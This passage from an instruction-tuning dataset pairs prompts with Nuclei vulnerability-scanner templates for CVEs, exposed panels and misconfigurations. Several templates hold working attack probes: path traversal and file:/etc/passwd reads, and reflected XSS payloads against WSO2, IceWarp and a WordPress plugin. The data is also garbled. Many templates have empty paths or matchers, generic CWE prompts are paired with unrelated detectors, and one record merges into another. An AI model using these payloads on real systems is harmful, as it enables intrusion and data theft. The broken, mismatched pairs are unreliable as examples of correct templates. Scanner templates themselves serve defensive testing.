redmine-panel\n\ninfo:\n name: Redmine Login Panel - Detect\n author: righettod\n severity: info\n description: Redmine login panel was detected.\n tags: panel,redmine,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "redmine-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: tradingview\n\ninfo:\n name: Tradingview User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Tradingview user name information check was conducted.\n tags: osint,osint-finance,tradingview,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.tradingview.com/u/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\u2014 Trading Ideas &\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Unrestricted NetBIOS Access in EC2", "input": "Title: Unrestricted NetBIOS Access in EC2\nSummary: Unrestricted NetBIOS Access in EC2. Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access on TCP port 139 and UDP ports 137 and 138, increasing the risk of unauthorized access and potential security breaches.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: ec2-unrestricted-netbios\n\ninfo:\n name: Unrestricted NetBIOS Access in EC2\n author: princechaddha\n severity: critical\n description: Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access on TCP port 139 and UDP ports 137 and 138, increasing the risk of unauthorized access and potential security breaches.\n tags: cloud,devops,aws,amazon,ec2,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "ec2-unrestricted-netbios"} {"instruction": "Generate a Nuclei template for CVE-2021-33044", "input": "Title: Authentication Bypass in dahuasecurity ipc-hum7xxx_firmware and others\nSummary: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: dahuasecurity ipc-hum7xxx_firmware, dahuasecurity ipc-hx3xxx_firmware, dahuasecurity ipc-hx5xxx_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33044\n\ninfo:\n name: Dahua IPC/VTH/VTO - Authentication Bypass\n author: gy741\n severity: critical\n description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\n tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"result\":true,\"session\"\" \n - \"id\" \n - \"params\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-33044"} {"instruction": "Generate a Nuclei template for: Atlassian Bamboo Build Dashboard", "input": "Title: Atlassian Bamboo Build Dashboard\nSummary: Atlassian Bamboo Build Dashboard. Tags: misconfig, atlassian, bamboo\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: atlassian-bamboo-build\n\ninfo:\n name: Atlassian Bamboo Build Dashboard\n author: DhiyaneshDK\n severity: info\n description: Atlassian Bamboo Build Dashboard\n tags: misconfig,atlassian,bamboo,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/allPlans.action\" \n matchers:\n - type: word\n words:\n - \"Project\" \n - \"Plan\" \n - \"Build\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "atlassian-bamboo-build"} {"instruction": "Generate a Nuclei template for: Smart Slider 3 Detection", "input": "Title: Smart Slider 3 Detection\nSummary: Smart Slider 3 Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-smart-slider-3\n\ninfo:\n name: Smart Slider 3 Detection\n author: ricardomaia\n severity: info\n description: Smart Slider 3 Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-smart-slider-3"} {"instruction": "Generate a Nuclei template for CVE-2022-26271", "input": "Title: Vulnerability (CWE-552) in 74cms 74cms\nSummary: 74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \\index\\controller\\Download.php.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: high\nAffected Products: 74cms 74cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-26271\n\ninfo:\n name: 74cmsSE v3.4.1 - Arbitrary File Read\n author: ritikchaddha\n severity: high\n description: 74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \\index\\controller\\Download.php.\n tags: cve,cve2022,74cms,lfr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index/download/index?name=index.php&url=../../application/database.php\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"alt=\"Bitwarden\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bitwarden-vault-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cyberpanel-panel\n\ninfo:\n name: Cyberpanel Login Panel - Detect\n author: mailler\n severity: info\n description: Cyberpanel login panel was detected.\n tags: cyberpanel,panel,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect SQL Injection", "input": "Title: SQL Injection (CWE-89)\nSummary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.\nVulnerability Type: SQL Injection\nSeverity: critical\nIndicators: vulnerability detected, error", "output": "id: pbootcms-database-file-download\n\ninfo:\n name: PbootCMS 2.0.7 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: PbootCMS 2.0.7 contains a SQL injection vulnerability via pbootcms.db. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n tags: pbootcms,db,exposure,database,sqlite,sqli,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/data/pbootcms.db\" \n matchers:\n - type: word\n words:\n - \"PbootCMS\" \n - \"SQLite format 3\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "critical", "id": "CWE-89"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: nairaland\n\ninfo:\n name: Nairaland User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Nairaland user name information check was conducted.\n tags: osint,osint-news,nairaland,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.nairaland.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s Profile\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2019-16920", "input": "Title: OS Command Injection in dlink dir-655_firmware and others\nSummary: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: dlink dir-655_firmware, dlink dir-866l_firmware, dlink dir-652_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-16920\n\ninfo:\n name: D-Link Routers - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.\n tags: cve2019,cve,dlink,rce,router,unauth,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-16920"} {"instruction": "Generate a Nuclei template for CVE-2024-6420", "input": "Title: Unknown Vulnerability in wpplugins hide_my_wp_ghost\nSummary: The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: wpplugins hide_my_wp_ghost\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6420\n\ninfo:\n name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure\n author: jpg0mez\n severity: high\n description: The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/?gf_page=randomstring\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"%2F%3Fgf_page%3Drandomstring&reauth=1\" \n part: header", "category": "cve", "severity": "high", "id": "CVE-2024-6420"} {"instruction": "Generate a Nuclei template for CVE-2021-31805", "input": "Title: Vulnerability (CWE-917) in apache struts\nSummary: The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\nVulnerability Type: Vulnerability (CWE-917)\nSeverity: critical\nAffected Products: apache struts\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31805\n\ninfo:\n name: Apache Struts2 S2-062 - Remote Code Execution\n author: taielab\n severity: critical\n description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n tags: cve2021,cve,apache,rce,struts,struts2,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "critical", "id": "CVE-2021-31805"} {"instruction": "Generate a Nuclei template for: CrunchRAT Malware - Detect", "input": "Title: CrunchRAT Malware - Detect\nSummary: CrunchRAT Malware - Detect. Tags: malware, file, crunchrat\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: crunchrat-malware\n\ninfo:\n name: CrunchRAT Malware - Detect\n author: daffainfo\n severity: info\n description: CrunchRAT Malware - Detect\n tags: malware,file,crunchrat\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "crunchrat-malware"} {"instruction": "Generate a Nuclei template for: Lotus Domino Configuration Page", "input": "Title: Lotus Domino Configuration Page\nSummary: Lotus Domino Configuration Page. Lotus Domino configuration file is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: domcfg-page\n\ninfo:\n name: Lotus Domino Configuration Page\n author: gevakun\n severity: low\n description: Lotus Domino configuration file is exposed.\n tags: exposure,lotus,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/domcfg.nsf\" \n matchers:\n - type: word\n words:\n - \"Web Server Configuration\" \n - \"Mapping\" \n - \"Mappings\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "domcfg-page"} {"instruction": "Generate a Nuclei template for: Seeyon OA Fastjson Remote Code Execution", "input": "Title: Seeyon OA Fastjson Remote Code Execution\nSummary: Seeyon OA Fastjson Remote Code Execution. Seeyon OA Fastjson is vulnerable to RCE.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: seeyon-oa-fastjson-rce\n\ninfo:\n name: Seeyon OA Fastjson Remote Code Execution\n author: SleepingBag945\n severity: critical\n description: Seeyon OA Fastjson is vulnerable to RCE.\n tags: seeyon,oa,rce,fastjson,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"com.alibaba.fastjson.JSONException\" \n part: body", "category": "generic", "severity": "critical", "id": "seeyon-oa-fastjson-rce"} {"instruction": "Generate a Nuclei template for CVE-2024-32709", "input": "Title: SQL Injection in CVE-2024-32709\nSummary: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.\n\n\nVulnerability Type: SQL Injection\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-32709\n\ninfo:\n name: WP-Recall <= 16.26.5 - SQL Injection\n author: s4e-io\n severity: critical\n description: The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5(num)}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-32709"} {"instruction": "Generate a Nuclei template for: Personal FTP Service - Detect", "input": "Title: Personal FTP Service - Detect\nSummary: Personal FTP Service - Detect. Personal FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: personal-ftp-detect\n\ninfo:\n name: Personal FTP Service - Detect\n author: pussycat0x\n severity: info\n description: Personal FTP service was detected.\n tags: network,ftp,personal,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "personal-ftp-detect"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: pgadmin-exposure\n\ninfo:\n name: PostgreSQL pgAdmin Dashboard Panel - Detect\n author: princechaddha\n severity: info\n description: PostgreSQL pgAdmin Dashboard panel was detected.\n tags: unauth,pgadmin,postgres,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/browser/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"PGADMIN_LANGUAGE=\" \n part: header\n - type: word\n words:\n - \"pgAdmin\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2020-17453", "input": "Title: Cross-Site Scripting (XSS) in wso2 api_manager and others\nSummary: WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: wso2 api_manager, wso2 api_manager_analytics, wso2 api_microgateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-17453\n\ninfo:\n name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.\n tags: cve2020,cve,xss,wso2,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F\" \n matchers:\n - type: word\n words:\n - \"'';alert('document.domain')//';\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-17453"} {"instruction": "Generate a Nuclei template for: MCP SSE API Exposed - Detect", "input": "Title: MCP SSE API Exposed - Detect\nSummary: MCP SSE API Exposed - Detect. Detects exposed Model Context Protocol (MCP) servers through the SSE API. MCP servers often provide administrative access to AI tools, LLM systems, or other automation infrastructure. Exposed MCP interfaces can lead to unauthorized access, information disclosure, and potential system compromise. This template detects a SSE server event stream and returns the messages endpoint which can be used to POST JSON-RPC 2.0 requests.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: exposed-mcp-sse-server\n\ninfo:\n name: MCP SSE API Exposed - Detect\n author: domwhewell-sage\n severity: info\n description: Detects exposed Model Context Protocol (MCP) servers through the SSE API. MCP servers often provide administrative access to AI tools, LLM systems, or other automation infrastructure. Exposed MCP interfaces can lead to unauthorized access, information disclosure, and potential system compromise. This template detects a SSE server event stream and returns the messages endpoint which can be used to POST JSON-RPC 2.0 requests.\n tags: mcp,devtools,exposure,api,ai,llm,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/sse\" \n matchers:\n - type: dsl\n condition: or\n - type: dsl\n condition: or", "category": "generic", "severity": "info", "id": "exposed-mcp-sse-server"} {"instruction": "Generate a Nuclei template for: Graphql Ariadne Detect", "input": "Title: Graphql Ariadne Detect\nSummary: Graphql Ariadne Detect. Tags: tech, graphql, ariadne\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: graphql-ariadne-detect\n\ninfo:\n name: Graphql Ariadne Detect\n author: princechaddha\n severity: info\n description: Graphql Ariadne Detect\n tags: tech,graphql,ariadne\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/graphql\" \n - \"{{BaseURL}}/api/graphql\" \n - \"{{BaseURL}}/query\" \n - \"{{BaseURL}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Unknown directive '@abc'.\" \n part: body\n - type: word\n words:\n - \"Content-Type: text/html\" \n part: header\n - type: word\n words:\n - \"<html\" \n - \"<body\" \n part: body\n condition: or", "category": "generic", "severity": "info", "id": "graphql-ariadne-detect"} {"instruction": "Generate a Nuclei template for: Malicious SFX1 Hash - Detect", "input": "Title: Malicious SFX1 Hash - Detect\nSummary: Malicious SFX1 Hash - Detect. SFX with voicemail content\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sfx1-malware-hash\n\ninfo:\n name: Malicious SFX1 Hash - Detect\n author: pussycat0x\n severity: info\n description: SFX with voicemail content\n tags: malware,sfx1\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sfx1-malware-hash"} {"instruction": "Generate a Nuclei template for CVE-2022-0653", "input": "Title: Cross-Site Scripting (XSS) in cozmoslabs profile_builder\nSummary: The Profile Builder \u2013 User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: cozmoslabs profile_builder\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0653\n\ninfo:\n name: Wordpress Profile Builder Plugin Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..\n tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404\" \n matchers:\n - type: word\n words:\n - \"<a href=\"javascript:alert(document.domain);\">here</a>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0653"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - DBLP", "input": "Title: Content-Security-Policy Bypass - DBLP\nSummary: Content-Security-Policy Bypass - DBLP. Tags: xss, csp-bypass, dblp\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: dblp-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - DBLP\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - DBLP\n tags: xss,csp-bypass,dblp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"dblp.org\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "dblp-csp-bypass"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - LivePerson LPTAG", "input": "Title: Content-Security-Policy Bypass - LivePerson LPTAG\nSummary: Content-Security-Policy Bypass - LivePerson LPTAG. Tags: xss, csp-bypass, liveperson-lptag\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: liveperson-lptag-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - LivePerson LPTAG\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - LivePerson LPTAG\n tags: xss,csp-bypass,liveperson-lptag,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"liveperson.net\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "liveperson-lptag-csp-bypass"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: movable-type-login\n\ninfo:\n name: Movable Type Pro Login Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: Movable Type Pro login panel was detected.\n tags: panel,movable,sixapart,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mt/admin\" \n - \"{{BaseURL}}/mt.cgi\" \n matchers:\n - type: word\n words:\n - \"Movable Type Pro\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: automation-direct\n\ninfo:\n name: AutomationDirect Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: AutomationDirect panel was detected.\n tags: panel,iot,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.html\" \n matchers:\n - type: word\n words:\n - \"<TITLE>C-more -- the best HMI presented by AutomationDirect\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Dahua Smart Park Management Platform - Arbitary File Read", "input": "Title: Dahua Smart Park Management Platform - Arbitary File Read\nSummary: Dahua Smart Park Management Platform - Arbitary File Read. Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: dahua-wpms-lfi\n\ninfo:\n name: Dahua Smart Park Management Platform - Arbitary File Read\n author: DhiyaneshDk\n severity: high\n description: Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.\n tags: lfi,dahua,wpms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd\" \n matchers:\n - type: word\n words:\n - \"filename=passwd\" \n part: header\n - type: regex\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "dahua-wpms-lfi"} {"instruction": "Generate a Nuclei template for CVE-2020-27982", "input": "Title: Cross-Site Scripting (XSS) in icewarp mail_server\nSummary: IceWarp 11.4.5.0 allows XSS via the language parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: icewarp mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-27982\n\ninfo:\n name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.\n tags: cve,cve2020,xss,icewarp,packetstorm,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-27982"} {"instruction": "Generate a Nuclei template for CVE-2019-17232", "input": "Title: Vulnerability (CWE-306) in etoilewebdesign ultimate_faq\nSummary: Functions/EWD_UFAQ_Import.php in the ultimate-faqs plugin through 1.8.24 for WordPress allows unauthenticated options import.\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: high\nAffected Products: etoilewebdesign ultimate_faq\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-17232\n\ninfo:\n name: WordPress Ultimate FAQs <= 1.8.24 \u2013 Unauthenticated Options Import and Export\n author: daffainfo\n severity: high\n description: Functions/EWD_UFAQ_Import.php in the ultimate-faqs plugin through 1.8.24 for WordPress allows unauthenticated options import.\n tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,unauth,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"Question\"\" \n - \"\"Answer\"\" \n - \"\"Categories\"\" \n - \"{{string}}\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-17232"} {"instruction": "Generate a Nuclei template for: Graphql Strawberry Detect", "input": "Title: Graphql Strawberry Detect\nSummary: Graphql Strawberry Detect. Tags: tech, graphql, strawberry\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: graphql-strawberry-detect\n\ninfo:\n name: Graphql Strawberry Detect\n author: princechaddha\n severity: info\n description: Graphql Strawberry Detect\n tags: tech,graphql,strawberry\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/graphql\" \n - \"{{BaseURL}}/api/graphql\" \n - \"{{BaseURL}}/query\" \n - \"{{BaseURL}}/\" \n matchers:\n - type: status\n status:\n - 